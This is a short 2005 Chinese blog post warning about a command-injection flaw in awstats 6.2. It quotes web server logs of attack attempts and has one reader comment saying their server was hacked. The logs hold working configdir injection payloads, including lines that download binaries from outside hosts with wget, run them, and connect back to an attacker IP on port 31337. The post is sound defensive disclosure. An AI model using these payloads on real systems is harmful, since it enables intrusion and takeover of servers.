2005-02-24

awstats的安全问题

awstats 6.2存在安全漏洞,当用户在URL里置入恶意代码时可以获得很多系统信息,甚至侵入系统。


看看日志文件的部分内容:

65.2.52.146 - - [19/Feb/2005:02:07:53 +0100] "POST /cgi-bin/awstats.pl?configdir=|echo%20;echo%20;id;echo%20;echo| HTTP/1.0" 404 216 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)"
65.11.149.95 - - [19/Feb/2005:04:26:55 +0100] "GET /awstats/awstats.pl?configdir=|echo%20;echo%20;id;echo%20;echo| HTTP/1.0" 200 546 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)"
65.11.149.95 - - [19/Feb/2005:04:26:57 +0100] "GET /cgi-bin/awstats.pl?configdir=|echo%20;echo%20;id;echo%20;echo| HTTP/1.0" 404 216 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)"
65.11.149.95 - - [19/Feb/2005:04:33:14 +0100] "GET /awstats//awstats.pl?configdir=|echo%20;echo%20__comeco__;%20uname%20-a;%20id;%20pwd;%20wget%20;echo%20__fim__;echo%20| HTTP/1.1" 403 264 "-" "-"
65.2.50.231 - - [19/Feb/2005:10:38:12 +0100] "GET /cgi-bin/awstats.pl?configdir=|echo%20;echo%20;id;echo%20;echo| HTTP/1.0" 404 216 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)"
65.2.50.231 - - [19/Feb/2005:10:38:11 +0100] "GET /awstats/awstats.pl?configdir=|echo%20;echo%20;id;echo%20;echo| HTTP/1.0" 200 546 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)"
68.21.2.4 - - [19/Feb/2005:21:04:44 +0100] "GET /awstats//awstats.pl?configdir=|echo%20;echo%20__comeco__;%20uname%20-a;%20id;%20pwd;%20uptime;%20df%20-h%20;echo%20__fim__;echo%20| HTTP/1.1" 403 277 "-" "-"
200.138.23.115 - - [20/Feb/2005:06:23:24 +0100] "GET /awstats/awstats.pl?configdir=|echo%20;echo%20__comeco__;uname%20-a;id;pwd;echo%20__fim__;echo%20| HTTP/1.1" 403 243 "-" "-"
200.138.23.115 - - [20/Feb/2005:06:23:29 +0100] "GET /awstats/awstats.pl?configdir=|echo%20;echo%20;id;echo%20;echo| HTTP/1.1" 200 546 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)"
200.138.23.115 - - [20/Feb/2005:06:23:41 +0100] "GET /awstats/awstats.pl?configdir=|echo%20;echo%20;uname%20-a;echo%20;echo| HTTP/1.1" 200 566 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)"
200.138.23.115 - - [20/Feb/2005:06:23:53 +0100] "GET /awstats/awstats.pl?configdir=|echo%20;echo%20;cd%20/tmp;ls;echo%20;echo| HTTP/1.1" 200 35973 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)"
200.138.23.115 - - [20/Feb/2005:06:23:59 +0100] "GET /awstats/awstats.pl?configdir=|echo%20;echo%20;cd%20/tmp;pwd;echo%20;echo| HTTP/1.1" 200 504 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)"
200.138.23.115 - - [20/Feb/2005:06:24:07 +0100] "GET /awstats/awstats.pl?configdir=|echo%20;echo%20;cd%20/tmp;wget%20www.mobettah.com.br/dc;echo%20;echo| HTTP/1.1" 200 523 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)"
200.138.23.115 - - [20/Feb/2005:06:24:24 +0100] "GET /awstats/awstats.pl?configdir=|echo%20;echo%20;cd%20/tmp;chmod%20777%20dc;./dc%20200.138.23.115%2031337;echo%20;echo| HTTP/1.1" 200 665 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)"
200.138.23.115 - - [20/Feb/2005:06:24:27 +0100] "GET /awstats/awstats.pl?configdir=|echo%20;echo%20;cd%20/tmp;chmod%20777%20dc;./dc%20200.138.23.115%2031337;echo%20;echo| HTTP/1.1" 200 654 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)"
200.151.248.112 - - [20/Feb/2005:06:41:15 +0100] "GET /cgi-bin/awstats.pl?configdir=|echo%20;echo%20;uname%20-a;id;uptime;pwd;echo%20;echo%20| HTTP/1.1" 404 216 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows 98; DigExt)"
69.34.141.197 - - [21/Feb/2005:01:04:26 +0100] "GET /awstats//awstats.pl?configdir=|echo%20;echo%20__comeco__;%20cd%20/tmp;%20wget%20atomix.0catch.com/rpcd;%20chmod%20777%20/tmp/rpcd;%20/tmp/rpcd%20;echo%20__fim__;echo%20| HTTP/1.1" 403 315 "-" "-"
69.34.141.197 - - [21/Feb/2005:01:04:38 +0100] "GET /awstats//awstats.pl?configdir=|echo%20;echo%20__comeco__;%20ls%20;echo%20__fim__;echo%20| HTTP/1.1" 403 235 "-" "-"


发帖者 时间:
标签: ,

1 条评论:

  1. frank2005年6月16日 08:09:00

    我也发现,并且机器也被黑了,可怕,不知道最新的版本有没有解决这个问题

    回复删除

订阅: 博文评论 (Atom)